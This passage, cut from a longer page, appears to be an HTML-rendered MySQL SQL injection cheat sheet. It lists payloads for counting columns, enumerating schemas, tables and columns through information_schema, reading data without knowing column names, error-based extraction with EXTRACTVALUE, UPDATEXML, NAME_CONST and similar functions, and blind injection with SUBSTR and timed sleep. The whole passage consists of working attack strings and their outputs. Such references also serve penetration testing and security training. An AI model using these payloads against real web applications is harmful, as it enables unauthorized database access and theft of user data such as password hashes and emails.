class="p">,</span><span class="mi">75</span><span class="p">,</span><span class="mi">76</span><span 
class="p">,</span><span class="mi">77</span><span class="p">,</span><span class="mi">78</span><s
</code></pre></div>
<h4 id="limit-into-method">LIMIT INTO Method</h4>
<p>This method is effective when error reporting is enabled. It helps determine the number of columns when the injection point is located after a <code>LIMIT</code> clause, where <code>ORDER BY</code> can no longer be appended.</p>
<table>
<thead>
<tr>
<th>Payload</th>
<th>Error</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>1' LIMIT 1,1 INTO @--+</code></td>
<td><code>The used SELECT statements have a different number of columns</code></td>
</tr>
<tr>
<td><code>1' LIMIT 1,1 INTO @,@--+</code></td>
<td><code>The used SELECT statements have a different number of columns</code></td>
</tr>
<tr>
<td><code>1' LIMIT 1,1 INTO @,@,@--+</code></td>
<td><code>No error means query uses 3 columns</code></td>
</tr>
</tbody>
</table>
<p>Since the third payload does not produce an error, the query uses 3 columns: <code>-1' UNION SELECT 1,2,3--+</code>.</p>
<h3 id="extract-database-with-information_schema">Extract Database With Information_Schema</h3>
<p>This query retrieves the names of all schemas (databases) on the server.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,...,</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">x7c</span><span class="p">,</span><span class="k">schema_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x7c</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">schemata</span>
</code></pre></div>
<p>This query retrieves the names of all tables within a specified schema (the schema name is represented by PLACEHOLDER).</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,...,</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">x7c</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">table_schema</span><span class="o">=</span><span class="n">PLACEHOLDER</span>
</code></pre></div>
<p>This query retrieves the names of all columns in a specified table.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,...,</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">x7c</span><span class="p">,</span><span class="k">column_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">table_name</span><span class="o">=</span><span class="p">...</span>
</code></pre></div>
<p>This query retrieves data from a specific table; <code>data</code> and the trailing <code>...</code> stand for the target column and table.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,...,</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">x7c</span><span class="p">,</span><span class="k">data</span><span class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">...</span>
</code></pre></div>
<h3 id="extract-columns-name-without-information_schema">Extract Columns Name Without Information_Schema</h3>
<p>Method for <code>MySQL &gt;= 4.1</code>.</p>
<table>
<thead>
<tr>
<th>Payload</th>
<th>Output</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>(1)and(SELECT * from db.users)=(1)</code></td>
<td>Operand should contain <strong>4</strong> column(s)</td>
</tr>
<tr>
<td><code>1 and (1,2,3,4) = (SELECT * from db.users UNION SELECT 1,2,3,4 LIMIT 1)</code></td>
<td>Column '<strong>id</strong>' cannot be null</td>
</tr>
</tbody>
</table>
<p>Method for <code>MySQL 5</code>.</p>
<table>
<thead>
<tr>
<th>Payload</th>
<th>Output</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>UNION SELECT * FROM (SELECT * FROM users JOIN users b)a</code></td>
<td>Duplicate column name '<strong>id</strong>'</td>
</tr>
<tr>
<td><code>UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a</code></td>
<td>Duplicate column name '<strong>name</strong>'</td>
</tr>
<tr>
<td><code>UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a</code></td>
<td>Data</td>
</tr>
</tbody>
</table>
<h3 id="extract-data-without-columns-name">Extract Data Without Columns Name</h3>
<p>Extracting data from the 4th column without knowing its name.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">`</span><span class="mi">4</span><span class="o">`</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">USERS</span><span class="p">)</span><span class="n">DBNAME</span><span class="p">;</span>
</code></pre></div>
<p>Injection example inside the query <code>select author_id,title from posts where author_id=[INJECT_HERE]</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="n">MariaDB</span><span class="w"> </span><span class="p">[</span><span class="n">dummydb</span><span class="p">]</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">AUTHOR_ID</span><span class="p">,</span><span class="n">TITLE</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">POSTS</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">AUTHOR_ID</span><span class="o">=-</span><span class="mi">1</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">CONCAT</span><span class="p">(</span><span class="o">`</span><span class="mi">3</span><span class="o">`</span><span class="p">,</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,</span><span class="o">`</span><span class="mi">4</span><span class="o">`</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">USERS</span><span class="p">)</span><span class="n">A</span><span 
class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">);</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="o">+</span><span class="c1">-----------+-----------------------------------------------------------------+</span>
<a id="__codelineno-10-3" name="__codelineno-10-3" href="#__codelineno-10-3"></a><span class="o">|</span><span class="w"> </span><span class="n">author_id</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-10-4" name="__codelineno-10-4" href="#__codelineno-10-4"></a><span class="o">+</span><span class="c1">-----------+-----------------------------------------------------------------+</span>
<a id="__codelineno-10-5" name="__codelineno-10-5" href="#__codelineno-10-5"></a><span class="o">|</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">a45d4e080fc185dfa223aea3d0c371b6cc180a37</span><span class="p">:</span><span class="n">veronica80</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">org</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-10-6" name="__codelineno-10-6" href="#__codelineno-10-6"></a><span class="o">+</span><span class="c1">-----------+-----------------------------------------------------------------+</span>
</code></pre></div>
<h2 id="mysql-error-based">MYSQL Error Based</h2>
<table>
<thead>
<tr>
<th>Name</th>
<th>Payload</th>
</tr>
</thead>
<tbody>
<tr>
<td>GTID_SUBSET</td>
<td><code>AND GTID_SUBSET(CONCAT('~',(SELECT version()),'~'),1337) -- -</code></td>
</tr>
<tr>
<td>JSON_KEYS</td>
<td><code>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',(SELECT version()),'~')) USING utf8))) -- -</code></td>
</tr>
<tr>
<td>EXTRACTVALUE</td>
<td><code>AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT version()),'~')) -- -</code></td>
</tr>
<tr>
<td>UPDATEXML</td>
<td><code>AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- -</code></td>
</tr>
<tr>
<td>EXP</td>
<td><code>AND EXP(~(SELECT * FROM (SELECT CONCAT('~',(SELECT version()),'~','x'))x)) -- -</code></td>
</tr>
<tr>
<td>OR</td>
<td><code>OR 1 GROUP BY CONCAT('~',(SELECT version()),'~',FLOOR(RAND(0)*2)) HAVING MIN(0) -- -</code></td>
</tr>
<tr>
<td>NAME_CONST</td>
<td><code>AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--</code></td>
</tr>
</tbody>
</table>
<h3 id="mysql-error-based-basic">MYSQL Error Based - Basic</h3>
<p>Works with <code>MySQL &gt;= 4.1</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">ROW</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">&gt;</span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="k">COUNT</span><span class="p">(</span><span class="o">*</span><span class="p">),</span><span class="n">CONCAT</span><span class="p">(</span><span class="n">CONCAT</span><span class="p">(</span><span class="o">@@</span><span class="k">VERSION</span><span class="p">),</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,</span><span class="n">FLOOR</span><span class="p">(</span><span class="n">RAND</span><span class="p">()</span><span class="o">*</span><span class="mi">2</span><span class="p">))</span><span class="n">X</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="n">A</span><span class="w"> </span><span class="k">GROUP</span><span class="w"> </span><span class="k">BY</span><span class="w"> </span><span class="n">X</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="mi">1</span><span class="p">))</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a><span class="s1">&#39;+(SELECT 1 AND ROW(1,1)&gt;(SELECT COUNT(*),CONCAT(CONCAT(@@VERSION),0X3A,FLOOR(RAND()*2))X FROM (SELECT 1 UNION SELECT 2)A GROUP BY X LIMIT 1))+&#39;</span>
</code></pre></div>
<h3 id="mysql-error-based-updatexml-function">MYSQL Error Based - UpdateXML Function</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="k">AND</span><span class="w"> </span><span class="n">updatexml</span><span class="p">(</span><span class="n">rand</span><span class="p">(),</span><span class="n">concat</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">version</span><span class="p">(),</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="o">-</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="k">AND</span><span class="w"> </span><span class="n">updatexml</span><span class="p">(</span><span class="n">rand</span><span class="p">(),</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">concat</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">schema_name</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">schemata</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="c1">--</span>
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a><span class="k">AND</span><span class="w"> </span><span class="n">updatexml</span><span class="p">(</span><span class="n">rand</span><span class="p">(),</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">concat</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">TABLE_NAME</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">TABLES</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">table_schema</span><span class="o">=</span><span class="n">data_column</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="c1">--</span>
<a id="__codelineno-12-4" name="__codelineno-12-4" href="#__codelineno-12-4"></a><span class="k">AND</span><span class="w"> </span><span class="n">updatexml</span><span class="p">(</span><span class="n">rand</span><span class="p">(),</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">concat</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">column_name</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">TABLE_NAME</span><span class="o">=</span><span class="n">data_table</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="c1">--</span>
<a id="__codelineno-12-5" name="__codelineno-12-5" href="#__codelineno-12-5"></a><span class="k">AND</span><span class="w"> </span><span class="n">updatexml</span><span class="p">(</span><span class="n">rand</span><span class="p">(),</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">concat</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="n">data_info</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">data_table</span><span class="p">.</span><span class="n">data_column</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="c1">--</span>
</code></pre></div>
<p>A shorter form of the same payloads:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="n">updatexml</span><span class="p">(</span><span class="k">null</span><span class="p">,</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x0a</span><span class="p">,</span><span class="k">version</span><span class="p">()),</span><span class="k">null</span><span class="p">)</span><span class="c1">-- -</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="n">updatexml</span><span class="p">(</span><span class="k">null</span><span class="p">,</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x0a</span><span class="p">,(</span><span class="k">select</span><span class="w"> </span><span class="k">table_name</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">table_schema</span><span class="o">=</span><span class="k">database</span><span class="p">()</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="c1">-- -</span>
</code></pre></div>
<h3 id="mysql-error-based-extractvalue-function">MYSQL Error Based - Extractvalue Function</h3>
<p>Works with <code>MySQL &gt;= 5.1</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">EXTRACTVALUE</span><span class="p">(</span><span class="n">RAND</span><span class="p">(),</span><span class="n">CONCAT</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">VERSION</span><span class="p">(),</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">)))</span><span class="c1">--</span>
<a id="__codelineno-14-2" name="__codelineno-14-2" href="#__codelineno-14-2"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">EXTRACTVALUE</span><span class="p">(</span><span class="n">RAND</span><span class="p">(),</span><span class="n">CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">CONCAT</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">schema_name</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">schemata</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="c1">--</span>
<a id="__codelineno-14-3" name="__codelineno-14-3" href="#__codelineno-14-3"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">EXTRACTVALUE</span><span class="p">(</span><span class="n">RAND</span><span class="p">(),</span><span class="n">CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">CONCAT</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">table_name</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">TABLES</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">table_schema</span><span class="o">=</span><span class="n">data_column</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="c1">--</span>
<a id="__codelineno-14-4" name="__codelineno-14-4" href="#__codelineno-14-4"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">EXTRACTVALUE</span><span class="p">(</span><span class="n">RAND</span><span class="p">(),</span><span class="n">CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">CONCAT</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">column_name</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">TABLE_NAME</span><span class="o">=</span><span class="n">data_table</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="c1">--</span>
<a id="__codelineno-14-5" name="__codelineno-14-5" href="#__codelineno-14-5"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">EXTRACTVALUE</span><span class="p">(</span><span class="n">RAND</span><span class="p">(),</span><span class="n">CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">CONCAT</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="n">data_column</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">data_schema</span><span class="p">.</span><span class="n">data_table</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="c1">--</span>
</code></pre></div>
<h3 id="mysql-error-based-name_const-function-only-for-constants">MYSQL Error Based - NAME_CONST function (only for constants)</h3>
<p>Works with <code>MySQL &gt;= 5.0</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="mi">1</span><span class="p">),</span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="mi">1</span><span class="p">))</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="n">x</span><span class="p">)</span><span class="c1">--</span>
<a id="__codelineno-15-2" name="__codelineno-15-2" href="#__codelineno-15-2"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">user</span><span class="p">(),</span><span class="mi">1</span><span class="p">),</span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">user</span><span class="p">(),</span><span class="mi">1</span><span class="p">))</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="n">x</span><span class="p">)</span><span class="c1">--</span>
<a id="__codelineno-15-3" name="__codelineno-15-3" href="#__codelineno-15-3"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">database</span><span class="p">(),</span><span class="mi">1</span><span class="p">),</span><span class="n">NAME_CONST</span><span class="p">(</span><span class="k">database</span><span class="p">(),</span><span class="mi">1</span><span class="p">))</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="n">x</span><span class="p">)</span><span class="c1">--</span>
</code></pre></div>
<h2 id="mysql-blind">MYSQL Blind</h2>
<h3 id="mysql-blind-with-substring-equivalent">MYSQL Blind With Substring Equivalent</h3>
<table>
<thead>
<tr>
<th>Function</th>
<th>Example</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>SUBSTR</code></td>
<td><code>SUBSTR(version(),1,1)=5</code></td>
<td>Extracts a substring from a string (starting at any position)</td>
</tr>
<tr>
<td><code>SUBSTRING</code></td>
<td><code>SUBSTRING(version(),1,1)=5</code></td>
<td>Extracts a substring from a string (starting at any position)</td>
</tr>
<tr>
<td><code>RIGHT</code></td>
<td><code>RIGHT(left(version(),1),1)=5</code></td>
<td>Extracts a number of characters from a string (starting from right)</td>
</tr>
<tr>
<td><code>MID</code></td>
<td><code>MID(version(),1,1)=4</code></td>
<td>Extracts a substring from a string (starting at any position)</td>
</tr>
<tr>
<td><code>LEFT</code></td>
<td><code>LEFT(version(),1)=4</code></td>
<td>Extracts a number of characters from a string (starting from left)</td>
</tr>
</tbody>
</table>
<p>Examples of Blind SQL injection using <code>SUBSTRING</code> or another equivalent function:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">SUBSTR</span><span class="p">(</span><span class="k">table_name</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span><span class="w"> </span><span class="o">&gt;</span><span class="w"> </span><span class="s1">&#39;A&#39;</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">SUBSTR</span><span class="p">(</span><span class="k">column_name</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="w"> </span><span class="o">&gt;</span><span class="w"> </span><span class="s1">&#39;A&#39;</span>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">ASCII</span><span class="p">(</span><span class="k">LOWER</span><span class="p">(</span><span class="n">SUBSTR</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="o">=</span><span class="mi">51</span>
</code></pre></div>
<h3 id="mysql-blind-using-a-conditional-statement">MYSQL Blind Using a Conditional Statement</h3>
<ul>
<li>
<p>TRUE: <code>if @@version starts with a 5</code>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="mi">2100935</span><span class="s1">&#39; OR IF(MID(@@version,1,1)=&#39;</span><span class="mi">5</span><span class="s1">&#39;,sleep(1),1)=&#39;</span><span class="mi">2</span>
<a id="__codelineno-17-2" name="__codelineno-17-2" href="#__codelineno-17-2"></a><span class="n">Response</span><span class="p">:</span>
<a id="__codelineno-17-3" name="__codelineno-17-3" href="#__codelineno-17-3"></a><span class="n">HTTP</span><span class="o">/</span><span class="mi">1</span><span class="p">.</span><span class="mi">1</span><span class="w"> </span><span class="mi">500</span><span class="w"> </span><span class="n">Internal</span><span class="w"> </span><span class="n">Server</span><span class="w"> </span><span class="n">Error</span>
</code></pre></div>
</li>
<li>
